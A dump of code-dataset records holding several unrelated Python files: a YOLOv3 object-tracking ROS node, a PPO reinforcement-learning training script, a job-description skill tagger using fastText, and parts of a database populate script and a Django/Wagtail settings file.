db.session.add(mir)\n\n show_solution = ExerciseOutcome(\"Show solution\")\n retry = ExerciseOutcome(\"Retry\")\n correct = ExerciseOutcome(\"Correct\")\n wrong = ExerciseOutcome(\"Wrong\")\n typo = ExerciseOutcome(\"Typo\")\n too_easy = ExerciseOutcome(\"Too easy\")\n\n outcomes = [show_solution, retry, correct, wrong, typo, too_easy]\n\n db.session.add_all(outcomes)\n\n recognize = ExerciseSource(\"Recognize\")\n translate = ExerciseSource(\"Translate\")\n\n sources = [recognize, translate]\n\n db.session.add_all(sources)\n\n b1 = add_bookmark(db, mir, de, \"Schaf\", en, \"sheep\",\n datetime.datetime(2011, 1, 1, 1, 1, 1),\n \"Bitte... zeichne mir ein Schaf!\",\n \"http://www.derkleineprinz-online.de/text/2-kapitel/\",\n \"Der Kleine Prinz - Kapitel 2\")\n\n b2 = add_bookmark(db, mir, de, \"sprang\", en, \"jumped\",\n datetime.datetime(2011, 1, 1, 1, 1, 1),\n \"Ich sprang auf die Fusse.\",\n \"http://www.derkleineprinz-online.de/text/2-kapitel/\",\n \"Der Kleine Prinz - Kapitel 2\")\n\n bookmarks = [b1, b2]\n\n for i in range(0, 5):\n random_source = sources[random.randint(0, len(sources) - 1)]\n random_outcome = outcomes[random.randint(0, len(outcomes) - 1)]\n random_solving_speed = random.randint(500, 5000)\n exercise = Exercise(random_outcome, random_source,\n random_solving_speed, datetime.datetime.now())\n random_bookmark = bookmarks[random.randint(0, len(bookmarks) - 1)]\n random_bookmark.add_new_exercise(exercise)\n\n global TEST_BOOKMARKS_COUNT\n TEST_BOOKMARKS_COUNT = 2\n db.session.commit()\n","sub_path":"zeeguu/populate.py","file_name":"populate.py","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"440136235","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n \nimport roslib\nroslib.load_manifest('yolov3_transfer')\nimport sys\nimport rospy\nimport cv2\nimport time\nimport numpy as np\nfrom pylab import *\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom tracking_object import Detected_object\nsys.path.append(\"..\")\nfrom my_yolo_track.msg import TrackInfos\nfrom my_yolo_track.msg import TrackInfo\n\n\nclass image_converter:\n \n def __init__(self):\n self.net = cv2.dnn.readNet(\"../weights/yolov3.weights\",\"../cfg/yolov3.cfg\")\n self.classes = []\n with open(\"coco.names\",\"r\") as f:\n self.classes = [line.strip() for line in f.readlines()]\n #print(classes)\n self.layer_names = self.net.getLayerNames()\n self.output_layers = [self.layer_names[i[0] - 1] for i in self.net.getUnconnectedOutLayers()]\n self.colors = np.random.uniform(0,255,size = (len(self.classes),3))\n \n self.det_objs = TrackInfos()\n self.yolo_finish_flag = False\n self.color_dif_confidance = 0.1\n\n self.image_pub = rospy.Publisher(\"pub_image_yolov3\",Image,queue_size=10)\n self.info_pub = rospy.Publisher(\"pub_track_info\",TrackInfos,queue_size=10)\n \n self.bridge = CvBridge()\n # subscribe image\n self.rgb_image_sub = rospy.Subscriber(\"/camera/rgb/image_raw\",Image,self.callback_rgb)\n self.depth_image_sub = rospy.Subscriber(\"/camera/depth/image_raw\",Image,self.callback_depth)\n self.font = cv2.FONT_HERSHEY_PLAIN\n self.starting_time = time.time()\n self.frame_id = 0 # frame counter, to calculate the fps by using (the number of frame) / (elapsed_time)\n self.track_counter = 0\n \n \n def callback_rgb(self,data):\n try:\n frame = self.bridge.imgmsg_to_cv2(data, \"bgr8\")\n self.frame_id += 1\n #_, frame = cv_image\n except CvBridgeError as e:\n print(e)\n \n #cv2.imshow(\"image window\",frame)\n (rows,cols,channels) = frame.shape\n \n #cv2.imshow(\"Image window\", frame)\n # Detecting objects\n blob = cv2.dnn.blobFromImage(frame, 0.00392, (416, 416), (0, 0, 0), True, crop=False)\n self.net.setInput(blob)\n outs = self.net.forward(self.output_layers)\n\n print(\"rgb_image\")\n print(cols)\n print(rows)\n \n # Showing informations on the screen\n class_ids = []\n confidences = []\n boxes = []\n for out in outs:\n for detection in out:\n scores = detection[5:]\n class_id = np.argmax(scores)\n confidence = scores[class_id]\n if confidence > 0.2:\n # Object detected\n center_x = int(detection[0] * cols)\n center_y = int(detection[1] * rows)\n w = int(detection[2] * cols)\n h = int(detection[3] * rows)\n\n # Rectangle coordinates\n x = int(center_x - w / 2)\n y = int(center_y - h / 2)\n\n boxes.append([x, y, w, h])\n confidences.append(float(confidence))\n class_ids.append(class_id)\n\n indexes = cv2.dnn.NMSBoxes(boxes, confidences, 0.8, 0.3)\n \n for i in range(len(boxes)):\n if i in indexes:\n x, y, w, h = boxes[i]\n label = str(self.classes[class_ids[i]])\n confidence = confidences[i]\n color = self.colors[class_ids[i]]\n color_total_r = 0.0\n color_total_g = 0.0\n color_total_b = 0.0\n object_id = \"\"\n counter_pixel = 0\n\n a = x\n b = y # index for getting all pixels color information in boxes\n print(\"x,y,w,h\")\n print(x,y,w,h)\n\n # transversal all the pixels surrounded by this bounding box\n while(a <= x+w-1):\n b = y\n while(b <= y+h-1):\n color_total = frame[b,a]\n color_total_b += color_total[0]\n color_total_g += color_total[1]\n color_total_r += color_total[2]\n b += 1\n counter_pixel += 1\n a +=1\n \n color_b_now = color_total_b / counter_pixel\n color_g_now = color_total_g / counter_pixel\n color_r_now = color_total_r / counter_pixel # the average color(bgr) information in percentage of the detected boxes\n \n print(\"color_b_now,color_g_now,color_r_now\")\n print(color_b_now,color_g_now,color_r_now)\n\n saved_object_flag = False\n det_objs_num = len(self.det_objs.tracking_objects)\n # start to compare two frames' color difference\n for j in range(0,det_objs_num,1):\n tracking_object_self = self.det_objs.tracking_objects[j]\n color_dif_b = abs((color_b_now - tracking_object_self.color_b)/tracking_object_self.color_b)\n color_dif_g = abs((color_g_now - tracking_object_self.color_g)/tracking_object_self.color_g)\n color_dif_r = abs((color_r_now - tracking_object_self.color_r)/tracking_object_self.color_r)\n print(\"self_color\")\n print(tracking_object_self.color_b,tracking_object_self.color_g,tracking_object_self.color_r)\n \n if ((tracking_object_self.track_class == label) and (color_dif_b < self.color_dif_confidance) and \n (color_dif_g < self.color_dif_confidance) and (color_dif_r < self.color_dif_confidance)):\n print(\"saved object detected!\")\n tracking_object_self.center_x = x + w/2\n tracking_object_self.center_y = y + h/2\n tracking_object_self.color_b = color_b_now\n tracking_object_self.color_g = color_g_now\n tracking_object_self.color_r = color_r_now\n object_id = str(tracking_object_self.track_id)\n saved_object_flag = True\n \n if(saved_object_flag == False):\n print(\"no saved object detected, new object added\")\n self.track_counter += 1\n det_obj = TrackInfo()\n det_obj.center_x = x + w/2\n det_obj.center_y = y + h/2\n det_obj.track_class = label\n det_obj.track_id = self.track_counter\n det_obj.color_b = color_b_now\n det_obj.color_g = color_g_now\n det_obj.color_r = color_r_now\n self.det_objs.tracking_objects.append(det_obj)\n object_id = str(det_obj.track_id)\n\n \n cv2.rectangle(frame, (x, y), (x + w, y + h), color, 2)\n cv2.putText(frame, label + object_id + \" \" + str(round(confidence, 2)), (x, y + 30), self.font, 1, color, 1)\n \n \n elapsed_time = time.time() - self.starting_time\n fps = self.frame_id / elapsed_time\n cv2.putText(frame, \"FPS: \" + str(round(fps, 2)), (10, 50), self.font, 4, (0, 0, 0), 3)\n\n cv2.imshow(\"Image window\", frame)\n cv2.waitKey(3)\n \n try:\n self.image_pub.publish(self.bridge.cv2_to_imgmsg(frame, \"bgr8\"))\n except CvBridgeError as e:\n print(e)\n \n self.yolo_finish_flag = True\n\n\n def callback_depth(self,data):\n self.yolo_finish_flag = False\n #cv2.imshow(\"depth window\",depth_image)\n try:\n frame = self.bridge.imgmsg_to_cv2(data, \"32FC1\")\n \n except CvBridgeError as e:\n print(e)\n print(\"depth_image\")\n print(data.width)\n print(data.height)\n image_width = data.width\n image_height = data.height\n\n while True:\n if(self.yolo_finish_flag == True):\n break\n print(\"while loop end!\")\n print(self.det_objs.tracking_objects[0].track_class)\n for i in range(len(self.det_objs.tracking_objects)):\n tracking_depth_self = self.det_objs.tracking_objects[i]\n \n float_distance = frame[tracking_depth_self.center_y,tracking_depth_self.center_x]\n tracking_depth_self.distance = float_distance \n print(\"distance\")\n print(tracking_depth_self.distance)\n\n print(\"self.det_objs[]\")\n print(self.det_objs)\n self.info_pub.publish(self.det_objs)\n\n \n\n \ndef main(args):\n rospy.init_node('image_converter', anonymous=True)\n ic = image_converter()\n try:\n rospy.spin()\n except KeyboardInterrupt:\n print(\"Shutting down\")\n cv2.destroyAllWindows()\n \nif __name__ == '__main__':\n main(sys.argv)","sub_path":"my_yolo_track/scripts/real_time_yolo.py","file_name":"real_time_yolo.py","file_ext":"py","file_size_in_byte":9193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"468160008","text":"import gym\n\nfrom stable_baselines.common.policies import MlpPolicy\nfrom stable_baselines.common.vec_env import DummyVecEnv, VecNormalize\nfrom stable_baselines import PPO2\nfrom stable_baselines import PPO1\nfrom particle_env_continuous import PrticleEnv\nimport os\n\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n\n # env = gym.make('CartPole-v1')\n env = DummyVecEnv([lambda: PrticleEnv(alpha=1,beta=10,win_thre=1, max_timestep=256)])\n # Optional: PPO2 requires a vectorized environment to run\n # the env is now wrapped automatically when passing it to the constructor\n # env = DummyVecEnv([lambda: env])\n # env = VecNormalize(env, norm_obs=True, norm_reward=False,\n # clip_obs=10.)\n\n\n save_name = \"ppo1_coninuous_exp3\"\n if not os.path.exists(save_name):\n os.makedirs(save_name)\n # model = PPO2(MlpPolicy, env, verbose=0,tensorboard_log=\"./ppo2_particle_tensorboard/\",n_cpu_tf_sess=1)\n model = PPO1(MlpPolicy,env,verbose=0,\\\n timesteps_per_actorbatch=256,\n tensorboard_log=save_name,\\\n policy_kwargs={\"net_arch\": [dict(vf=[64,64,64], pi=[64,64,64])]},\\\n optim_stepsize = 3e-4,\n optim_batchsize=256,\n optim_epochs = 4,\n schedule='linear',\n n_cpu_tf_sess=16)\n model.learn(total_timesteps=int(2e7))\n model.save(save_name)\n\n del model # remove to demonstrate saving and loading","sub_path":"ppo1_coninuous_exp3.py","file_name":"ppo1_coninuous_exp3.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"231932700","text":"# JOB TAGGER // INTERN PROJECT SUMMER 18 // RIVIERA PARTNERS\n\nimport pandas as pd\nimport re\nfrom bs4 import BeautifulSoup\nimport numpy as np\nimport os\nfrom random import shuffle\nimport csv\nimport string\nimport math\nimport spacy\nfrom fuzzywuzzy import process\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nimport fastText\nfrom fastText import util\nfrom typing import List\nimport operator\nfrom collections import Counter\nfrom tqdm import tqdm\n\n# setup pandas dataframe of job descriptions file\nfile = 'job_descriptions_with_freeform.csv'\ndf = pd.read_csv(file)\n\nlanguages = ['abap', 'actionscript', 'ada', 'apex', 'arc', 'asp', 'assembly', 'ats', 'awk', 'c',\n\t'c#', 'c++', 'clips', 'clojure', 'cobol', 'coffeescript', 'coldfusion', 'css', 'css3',\n\t'dart', 'dm', 'erlang', 'factor', 'flex', 'forth', 'fortran', 'go', 'groovy',\n\t'handlebars', 'html', 'html5', 'idl', 'java', 'javascript', 'labview', 'liquid',\n\t'lisp', 'logo', 'lua', 'matlab', 'max', 'mercury', 'monkey', 'objective-c', 'pan',\n\t'pascal', 'perl', 'php', 'plsql', 'postscript', 'powershell', 'puppet', 'python', 'r',\n\t'ruby', 'sas', 'scala', 'scheme', 'shell', 'smalltalk', 'sql', 'swift', 'verilog',\n\t'vhdl', 'visual basic', 'xml', 'xquery', 'xslt']\n\ntechnologies = ['.net', 'accumulo', 'actionhero.js', 'activemq', 'activerecord reputation system',\n\t'aerospike', 'airavata', 'airflow', 'airmapview', 'algolia', 'amazon aurora',\n\t'amazon lambda', 'amazon rds', 'amazon route 53', 'ambari', 'android sdk',\n\t'angularjs', 'ansible', 'apache ant', 'apache apr', 'apache aurora',\n\t'apache camel', 'apache commons', 'apache continuum', 'apache crunch',\n\t'apache curator', 'apache drill', 'apache etch', 'apache flex', 'apache forrest',\n\t'apache graphics', 'apache hbase', 'apache james', 'apache lens', 'apache lucy',\n\t'apache mina', 'apache ode', 'apache perl', 'apache phoenix', 'apache pig',\n\t'apache poi', 'apache reef', 'apache server', 'apache sling', 'apache steve',\n\t'apache storm', 'apache subversion', 'apache tiles', 'apache velocity',\n\t'apache wink', 'apache workbench', 'apportable', 'archiva', 'arduino', 'aries',\n\t'asgard', 'atmosphere', 'aura', 'avro', 'aws rds', 'axis', 'azkaban',\n\t'backbone.js', 'big r', 'bigsql', 'bigtop', 'bloodhound', 'bookkeeper',\n\t'bootstrap', 'bourbon', 'bower', 'breakoutdetection', 'buildr', 'bval', 'cakephp',\n\t'calcite', 'camus', 'capistrano', 'cassandra', 'cayenne', 'celix', 'ceph',\n\t'cfengine', 'chaplin', 'chef', 'chukwa', 'circleci', 'clerezza', 'cloudfront',\n\t'cloudsearch', 'cloudstack', 'cocoa', 'cocoa touch', 'cocoon', 'compass',\n\t'cordova', 'couchbase', 'couchdb', 'creadur', 'crosswalk', 'cucumber', 'cuda',\n\t'cxf', 'dapper', 'data pipeline', 'databus', 'dataloader', 'datomic',\n\t'deeplinkdispatch', 'devicemap', 'devise', 'django', 'docker', 'draft.js',\n\t'dremel', 'dropwizard', 'durandal', 'dust', 'dustjs', 'dynamodb', 'ec2',\n\t'effective scala', 'ejabberd', 'elastic beanstalk', 'elastic mapreduce',\n\t'elasticache', 'elasticsearch', 'electron', 'ember.js', 'empire-db', 'emr',\n\t'enzyme', 'espresso.js', 'eureka', 'exhibitor', 'expressjs', 'f1',\n\t'facebook conceal', 'facebook flow', 'facebook flux', 'facebook origami',\n\t'facebook presto', 'falcon', 'fatcache', 'felix', 'finagle', 'firebase', 'flash',\n\t'flask', 'flink', 'flume', 'folly', 'framework7', 'freebase', 'fresco', 'fuelphp',\n\t'g2', 'gearman', 'geronimo', 'giraph', 'glusterfs', 'gobblin',\n\t'google closure library', 'gora', 'gpfs', 'grails', 'grape', 'graphql', 'gump',\n\t'gunicorn', 'hadoop', 'hama', 'handlebars.js', 'hapi', 'haproxy', 'helix', 'hhvm',\n\t'hibernate', 'hive', 'hopscotch', 'http server', 'httpcomponents', 'hystrix',\n\t'iago', 'ibm db2', 'ibm hbase', 'ignite', 'iis', 'immutable-js', 'impala', 'infer',\n\t'infinity', 'influxdb', 'informix', 'io.js', 'ionic', 'isis', 'jackrabbit', 'jade',\n\t'jclouds', 'jekyll', 'jena', 'jenkins', 'jest', 'jetty', 'jmeter', 'jquery',\n\t'jquery.payment', 'juddi', 'juniversal', 'kafka', 'karaf', 'kinesis', 'knox',\n\t'kohana', 'kubernetes', 'kvocontroller', 'kylin', 'labella.js', 'laravel', 'less',\n\t'leveldb', 'libcloud', 'lift framework', 'lighttpd', 'linux', 'lucene',\n\t'lucene.net', 'lumen', 'luminol', 'macgap', 'mahout', 'manhattan', 'manifoldjs',\n\t'marionette', 'marmotta', 'martini', 'material ui', 'materialize', 'maven',\n\t'mcrouter', 'memcached', 'mention-bot', 'mesos', 'metamodel', 'meteor',\n\t'miniprofiler', 'mithril', 'mnesia', 'mongodb', 'mono', 'mozilla brick', 'mrunit',\n\t'msmq', 'mustache', 'myfaces', 'mysql', 'neo4j', 'netty', 'nginx', 'nifi',\n\t'node.js', 'nodejs', 'nuclide', 'numpy', 'nutch', 'ofbiz', 'olingo', 'oodt',\n\t'oozie', 'openjpa', 'openlayers', 'openmeetings', 'opennlp', 'openoffice',\n\t'openstack', 'oracle database', 'orc', 'ormlite', 'padrino', 'paldb', 'parquet',\n\t'pathpicker', 'pdfbox', 'pfff', 'phalcon', 'phonegap', 'pinball', 'pincache',\n\t'pinot', 'pinremoteimage', 'play framework', 'polyglot.js', 'polymer', 'portals',\n\t'postcss lang optimizer', 'postgresql', 'primer', 'protocol buffers', 'proxygen',\n\t'pure.css', 'purifycss', 'pyexchange', 'pylons', 'qark', 'qpid', 'rabbitmq',\n\t'rails', 'react', 'react native', 'rebound', 'redis', 'redshift', 'relay',\n\t'requirejs', 'resque', 'rest.li', 'revel', 'rocksdb', 'sails.js', 'samza', 'sass',\n\t'scalding', 'scikit-learn', 'scipy', 'score pmml', 'scumblr', 'secure headers',\n\t'sensei', 'sequins', 'serf', 'servicemix', 'servicestack', 'shiro', 'shop',\n\t'simian army', 'simpledb', 'sinatra', 'skeleton', 'slim', 'smarty', 'solr',\n\t'spamassassin', 'spanner', 'spark', 'sphinx', 'spring', 'sql server', 'sqlite',\n\t'sqoop', 'squid', 'stanbol', 'stetho', 'stratos', 'struts', 'stylus', 'suit css',\n\t'sumingbird', 'symfony', 'synapse', 'syncope', 'tajo', 'tapestry', 'tastypie',\n\t'tcl', 'teamcity', 'tensorflow', 'tez', 'thrift', 'tika', 'timberlake', 'tomcat',\n\t'tomee', 'travis ci', 'turbine', 'tuscany', 'tweaks', 'twitter commons', 'twui',\n\t'uikit', 'uima', 'unix', 'usergrid', 'vagrant', 'varnish', 'vcl', 'vivisimo',\n\t'voldemort', 'vxquery', 'watson', 'wdt', 'webapp2', 'wherehows', 'wicket', 'xalan',\n\t'xamarin', 'xerces', 'xmlbeans', 'yesod', 'yii', 'zend framework', 'zeromq',\n\t'zest', 'zookeeper', 'ios sdk']\n\nskills = ['AI', 'Android', 'api', 'automated deployment',\n\t'automated software development', 'bayesian', 'big data', 'business intelligence',\n\t'change management', 'cicd', 'classification', 'cloud', 'cloud compute',\n\t'configuration management', 'containerization',\n\t'content management', 'continuous delivery', 'continuous deployment',\n\t'continuous integration', 'cryptography', 'dal', 'data analysis', 'data analyst',\n\t'data analytics', 'data ingestion', 'data mining', 'data pipelines',\n\t'data processing', 'data visualization', 'data warehousing', 'deep learning',\n\t'delivery pipeline', 'devops integration', 'distributed systems', 'dwbi', 'etl',\n\t'failover', 'fault tolerant', 'fibre channel',\n\t'file system', 'i/o', 'iaas', 'image processing', 'infrastructure',\n\t'infrastructure engineer', 'intrusion', 'ios', 'ip', 'load balance',\n\t'machine learning', 'mapreduce', 'messaging',\n\t'microservices', 'mining', 'ml', 'modeling', 'monitoring', 'msa', 'multithread',\n\t'multithreaded', 'multitier', 'mvc', 'n-tier', 'nas', 'network',\n\t'network programming', 'nlp', 'orchestration', 'paas', 'penetration testing',\n\t'performance', 'petabyte', 'platform', 'platform engineer', 'regression',\n\t'reinforcement learning', 'release', 'responsive',\n\t'rest services', 'restful', 'scraping', 'signal processing',\n\t'soa', 'soap', 'socket', 'spa', 'statistics', 'storage', 'storage system',\n\t'supervised learning', 'svm', 'tcp',\n\t'unsupervised learning', 'virtualization', 'visualization', 'vulnerability',\n\t'reliability', 'aws']\n\n\ndef get_words(x):\n\tno_html = re.sub(r'\\<.*?\\>', ' ', x)\n\tno_amps = re.sub(r'&.*? ', ' ', no_html)\n\n\tformatted = bytes(no_amps, 'utf-8').decode('utf-8', 'ignore')\n\n\tone = re.sub(r'[^A-Za-z0-9+]+', ' ', formatted)\n\ttwo = re.sub(r'[^+\\w\\s]',' ',one)\n\tthree = re.sub(r'/', ' ', two)\n\n\treturn three\n\n\ndef similarity_score(x, y):\n\n\tmodel = fastText.load_model('new_output.bin')\n\n\tv1 = model.get_word_vector(x)\n\n\tv2 = model.get_word_vector(y)\n\n\treturn cosine_similarity(v1, v2)\n\n\n\nVector = List[float]\n\ndef vector_len(v: Vector) -> float:\n return math.sqrt(sum([x*x for x in v]))\n\n\ndef dot_product(v1: Vector, v2: Vector) -> float:\n assert len(v1) == len(v2)\n return sum([x*y for (x,y) in zip(v1, v2)])\n\n\ndef cosine_similarity(v1: Vector, v2: Vector) -> float:\n \"\"\"\n Returns the cosine of the angle between the two vectors.\n Results range from -1 (very different) to 1 (very similar).\n \"\"\"\n return dot_product(v1, v2) / (vector_len(v1) * vector_len(v2))\n \n\ndef setup():\n\tprint(\"Loading job descriptions... \")\n\n\tglobal df\n\t# fill empty cells to prevent raised exception\n\tdf.description.fillna('', inplace=True)\n\n\t# remove html from description column\n\tdf.description = df.description.apply(lambda x: get_words(x))\n\tdf.description = df.description.apply(lambda x: bytes(x, 'utf-8').decode('utf-8', 'ignore')) \n\tdf.description = df.description.apply(lambda x: re.sub(r'[^A-Za-z0-9+]+', ' ', x)) \n\n\tdf.requirements.fillna('', inplace=True)\n\n\t# remove html from requirements column\n\tdf.requirements = df.requirements.apply(lambda x: get_words(x))\n\tdf.requirements = df.requirements.apply(lambda x: bytes(x, 'utf-8').decode('utf-8', 'ignore')) \n\tdf.requirements = df.requirements.apply(lambda x: re.sub(r'[^A-Za-z0-9+]+', ' ', x))\n\n\tprint(\"Job descriptions loaded.\")\n\n\n\ndef tech_deck():\n\n\t# load SpaCy pre-trained vector for entity extraction\n\tprint(\"Loading FastText model...\")\n\n\tmodel = fastText.load_model('new_output.bin') # load trained wiki/job model for later tagging\n\n\t\n\tfasttext_nn = FastTextNN(model) # pass fasttext model here for nearest neighbor implementation\n\n\tprint(\"FastText model loaded.\")\n\n\t# load stop words for cleaning purposes\n\tstop_words = set(stopwords.words('english'))\n\n\t# get list of current technologies\n\ttech_list = languages + technologies\n\n\t# CHANGE EXCEL OUTPUT FOR EACH MODE/SIZE\n\twith open('freeformjobs_skills.csv', 'w') as csvfile:\n\n\t\t# Initialize list for analysis of possible tags\n\t\tall_possible_tags = []\n\n\t\tfields = ['id', 'raw', 'tag_extracts', 'likely_tags', 'skill_extract']\n\t\twriter = csv.DictWriter(csvfile, fieldnames=fields)\n\t\twriter.writeheader()\n\n\t\tprint(\"Starting tagging...\")\n\n\t\tfor index, row in tqdm(df.iterrows(), total=df.shape[0]):\n\n\t\t\tcurrid = row['id']\n\n\t\t\tif len(row['requirements']) > 0:\n\t\t\t\trawtext = str(row['requirements'].encode('utf-8'))\n\t\t\telse:\n\t\t\t\trawtext = str(row['description'].encode('utf-8'))\n\n\t\t\toutput = []\n\t\t\tpossible_tags = []\n\n\t\t\t# only look at words that are initially capitalized\n\t\t\tmyList = rawtext.split()\n\t\t\tgoodList = []\n\t\t\tremovables = []\n\n\t\t\t# Remove stopwords\n\t\t\tfor word in myList:\n\t\t\t\tif word.lower() in stop_words:\n\t\t\t\t\tremovables.append(word)\n\n\t\t\tif 'san' in myList and 'francisco' in myList:\n\t\t\t\tremovables.append('san')\n\t\t\t\tremovables.append('francisco')\n\n\t\t\t[myList.remove(word) for word in removables]\n\n\t\t\t# Add any words with a capital letter to the potential list of tags\n\t\t\t[goodList.append(word) for word in myList if any(x.isupper() for x in word)]\n\n\t\t\t# Lower case every word\n\t\t\tgoodList = [x.lower() for x in goodList]\n\n\t\t\t# If any of the words are a direct match to our current tech list, add it as a tag\n\t\t\tfor item in goodList:\n\t\t\t\tresult = process.extractOne(item, tech_list)\n\t\t\t\tif ((result[1] >= 92) and (item not in output)):\n\t\t\t\t\toutput.append(item)\n\n\t\t\t[goodList.remove(word) for word in output]\n\n\t\t\t# Check for machine learning or AI\n\t\t\tif 'machine' in goodList and 'learning' in goodList:\n\t\t\t\toutput.append('machine learning')\n\t\t\t\tgoodList.remove('machine')\n\t\t\t\tgoodList.remove('learning')\n\t\t\telif 'artificial' in goodList and 'intelligence' in goodList:\n\t\t\t\toutput.append('AI')\n\t\t\t\tgoodList.remove('artificial')\n\t\t\t\tgoodList.remove('intelligence')\n\n\t\t\t# Analyze rest of words in FastText model\n\t\t\tfor item in goodList:\n\t\t\t\ttemp = fasttext_nn.nearest_words(item.lower())\n\t\t\t\tgood_matches = set([match[0] for match in temp if match[1] > .85])\n\t\t\t\tmyset = (good_matches) & (set(tech_list))\n\t\t\t\t# If word generates similar words that we do recognize, add it as a tag\n\t\t\t\tif (len(myset) > 0) and (item not in output) and (item not in possible_tags):\n\t\t\t\t\tpossible_tags.append(item)\n\t\t\t\t\tall_possible_tags.append(item)\n\n\n\t\t\t# Add skill/specialty tags based on languages/technologies used\n\t\t\tskillList = []\n\t\t\tfor tech in output:\n\t\t\t\tmax_score = 0\n\t\t\t\tskill_match = ''\n\t\t\t\tfor skill in skills:\n\t\t\t\t\tv1 = model.get_word_vector(tech)\n\t\t\t\t\tv2 = model.get_word_vector(skill)\n\t\t\t\t\tresult = cosine_similarity(v1, v2)\n\t\t\t\t\tif result > max_score:\n\t\t\t\t\t\tmax_score = result\n\t\t\t\t\t\tskill_match = skill\n\t\t\t\tskillList.append(skill_match)\n\n\t\t\tskillSet = Counter(skillList)\n\n\t\t\tif len(skillSet) > 0:\n\t\t\t\tbestSkill = skillSet.most_common()\n\n\t\t\t# final step: write output to excel file\n\t\t\twriter.writerow({'id': currid, 'raw': rawtext, 'tag_extracts': output, 'likely_tags' : possible_tags, 'skill_extract': bestSkill})\n\n\t\t\tdel output[:]\n\n\t\tprint(\"Tagging done!\")\n\n\t\thigh_frequency_tags = Counter(all_possible_tags)\n\t\tprint('High Frequency Possible Tags: ')\n\t\tprint(high_frequency_tags.most_common()[:10])\n\n\n\n# used this model from fastText's github to implement better nearest neighbor function\nclass FastTextNN:\n \n def __init__(self, ft_model, ft_matrix=None):\n self.ft_model = ft_model \n self.ft_words = ft_model.get_words()\n self.word_frequencies = dict(zip(*ft_model.get_words(include_freq=True)))\n self.ft_matrix = ft_matrix\n if self.ft_matrix is None:\n self.ft_matrix = np.empty((len(self.ft_words), ft_model.get_dimension()))\n for i, word in enumerate(self.ft_words):\n self.ft_matrix[i,:] = ft_model.get_word_vector(word)\n \n def find_nearest_neighbor(self, query, vectors, n=10, cossims=None):\n \"\"\"\n query is a 1d numpy array corresponding to the vector to which you want to\n find the closest vector\n vectors is a 2d numpy array corresponding to the vectors you want to consider\n\n cossims is a 1d numpy array of size len(vectors), which can be passed for efficiency\n returns the index of the closest n matches to query within vectors and the cosine similarity (cosine the angle between the vectors)\n\n \"\"\"\n if cossims is None:\n cossims = np.matmul(vectors, query, out=cossims)\n\n norms = np.sqrt((query**2).sum() * (vectors**2).sum(axis=1))\n cossims = cossims/norms\n result_i = np.argpartition(-cossims, range(n+1))[1:n+1]\n return list(zip(result_i, cossims[result_i]))\n\n def nearest_words(self, word, n=10, word_freq=None):\n result = self.find_nearest_neighbor(self.ft_model.get_word_vector(word), self.ft_matrix, n=n)\n if word_freq:\n return [(self.ft_words[r[0]], round(r[1]), 2) for r in result if self.word_frequencies[self.ft_words[r[0]]] >= word_freq]\n else:\n return [(self.ft_words[r[0]], round(r[1], 2)) for r in result]\n\n\n\nif __name__ == '__main__':\n\tsetup()\n\ttech_deck()\n\n\t","sub_path":"TagGenerator/job_tag_executable.py","file_name":"job_tag_executable.py","file_ext":"py","file_size_in_byte":15104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"222794987","text":"\"\"\"\nDjango settings for project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\nimport os\nfrom os.path import abspath, basename, dirname, join, normpath\nfrom sys import path\n\n# Absolute filesystem path to the Django project directory:\nDJANGO_ROOT = dirname(dirname(dirname(abspath(__file__))))\n\n# Absolute filesystem path to the top-level project folder:\nPROJECT_ROOT = dirname(DJANGO_ROOT)\n\n# Site name:\nSITE_NAME = basename(DJANGO_ROOT)\n\nWAGTAIL_SITE_NAME = \"Made with Wagtail\"\n\n# Search results template\nWAGTAILSEARCH_RESULTS_TEMPLATE = 'core/search_results.html'\n\n# Add our project to our pythonpath, this way we don't need to type our project\n# name in our dotted import paths:\npath.append(DJANGO_ROOT)\n\n\"\"\"\nTwo things are wrong with Django's default `SECRET_KEY` system:\n\n1. It is not random but pseudo-random\n2. It saves and displays the SECRET_KEY in `settings.py`\n\nThis snippet\n1. uses `SystemRandom()` instead to generate a random key\n2. saves a local `secret.txt`\n\nThe result is a random and safely hidden `SECRET_KEY`.\n\"\"\"\ntry:\n SECRET_KEY\nexcept NameError:\n SECRET_FILE = os.path.join(PROJECT_ROOT, 'secret.txt')\n try:\n SECRET_KEY = open(SECRET_FILE).read().strip()\n except IOError:\n try:\n import random\n SECRET_KEY = ''.join(\n [random.SystemRandom().choice('abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)') for i in range(50)]\n )\n secret = file(SECRET_FILE, 'w')\n secret.write(SECRET_KEY)\n secret.close()\n except IOError:\n Exception('Please create a %s file with random characters to generate your secret key!' % SECRET_FILE)\n\n# Hosts/domain names that are valid for this site; required if DEBUG is False\n# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts\nALLOWED_HOSTS = []\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'compressor',\n 'taggit',\n 'modelcluster',\n 'captcha',\n 'wagtailcaptcha',\n 'core',\n 'overextends',\n 'api',\n 'wagtailgmaps',\n 'rest_framework',\n 'wagtail.contrib.wagtailsitemaps',\n 'wagtail.contrib.wagtailroutablepage',\n 'wagtail.wagtailcore',\n 'wagtail.wagtailadmin',\n 'wagtail.wagtaildocs',\n 'wagtail.wagtailsnippets',\n 'wagtail.wagtailusers',\n 'wagtail.wagtailsites',\n 'wagtail.wagtailimages',\n 'wagtail.wagtailembeds',\n 'wagtail.wagtailsearch',\n 'wagtail.wagtailredirects',\n 'wagtail.wagtailforms',\n)\n\nMIDDLEWARE_CLASSES = (\n 